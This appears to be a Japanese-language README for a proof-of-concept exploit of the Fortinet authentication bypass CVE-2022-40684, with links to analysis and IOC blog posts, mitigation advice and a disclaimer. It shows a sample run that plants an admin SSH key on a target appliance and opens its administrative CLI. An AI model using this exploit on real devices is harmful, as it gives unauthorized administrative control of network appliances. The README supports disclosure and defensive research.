
Fortinet FortiOS、FortiProxy、FortiSwitchManager アプライアンスに影響する CVE-2022-40684 の POC。
この脆弱性の技術的な根本原因分析は、当社のブログでご覧いただけます: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
侵害の指標について Fortinet ログを分析する方法と、より詳細なログを有効にする方法については、当社の IOC ブログをご覧ください: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
この POC は、認証バイパスの脆弱性を悪用して、指定されたユーザーの SSH キーを設定します。
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
最新バージョンに更新するか、Fortinet PSIRT の指示に従って緩和してください。
このソフトウェアは、学術研究および効果的な防御技術の開発のみを目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用することを意図したものではありません。プロジェクトのメンテナーは、本ソフトウェアの誤用について一切の責任を負いません。責任を持って使用してください。